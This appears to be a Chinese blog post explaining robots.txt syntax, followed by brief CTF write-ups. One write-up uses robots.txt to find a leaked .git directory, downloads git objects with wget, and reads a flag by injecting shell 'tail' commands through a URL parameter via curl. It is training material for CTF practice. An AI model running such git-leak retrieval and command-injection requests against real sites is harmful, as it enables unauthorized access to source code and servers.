robots.txt用处:告诉spider程序服务器上什么文件可以访问,什么文件不能访问。
robots.txt写法:User-agent: * 这里的*代表的所有的搜索引擎种类,*是一个通配符
Disallow:/admin/ 这里指定该spider不能爬寻/admin/文件夹下的文件:这个关键字可以声明哪些文件不可以访问。/*?#,"#"表示以?结尾的页面。/*?有?的页面。
Allow:/允许访问根目录下的所有文件
Sitemap:网站地图,以XML文件形式存在,可以给没有连接指向的网页或者用户输入条件生成的动态网页提供入口,因为robots.txt位置固定,所以把Sitemap在里面肯定能找到。考虑到一个网站的网页众多,sitemap人工维护不太靠谱,google提供了工具可以自动生成sitemap。
通过robots的文件只是不想让爬虫扫,但是浏览器还是可以看,而彻底对搜索引擎隐身可以用元标记,即meta tag。
用到这个robot知识点的题目:
1、
尝试扫描扫不到,故想到robots协议
尝试login.php得到答案。
2、(GIT泄漏)未然
opensource(300pt)
(1)通过robots.txt发现有git泄露
(2)之后就是把文件下载下来并读取内容
wget http://121.40.86.166:39339/.git/objects/9c/dd2b4631ed0e3badfd1b257449873eb060b0d3
mkdir ./objects/9c
cp dd2b4631ed0e3badfd1b257449873eb060b0d3 ./objects/9c/dd2b4631ed0e3badfd1b257449873eb060b0d3
git cat-file -p 9cdd2b4631ed0e3badfd1b257449873eb060b0d3
wget http://121.40.86.166:39339/.git/index
cp index ./.git
git ls-files --stage
(3)通过读文件发现一个可以读flag的接口
curl http://121.40.86.166:39339/ac6555bfe23f5fe7e98fdcc0cd5f2451/\?pangci\=tail%20-n%20143 >> 1.txt
curl http://121.40.86.166:39339/ac6555bfe23f5fe7e98fdcc0cd5f2451/\?pangci\=tail%20-n%20138 >> 1.txt
KEY:
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:robots协议——(Robots Exclusion Protocol)网络爬虫排除标准 - Python技术站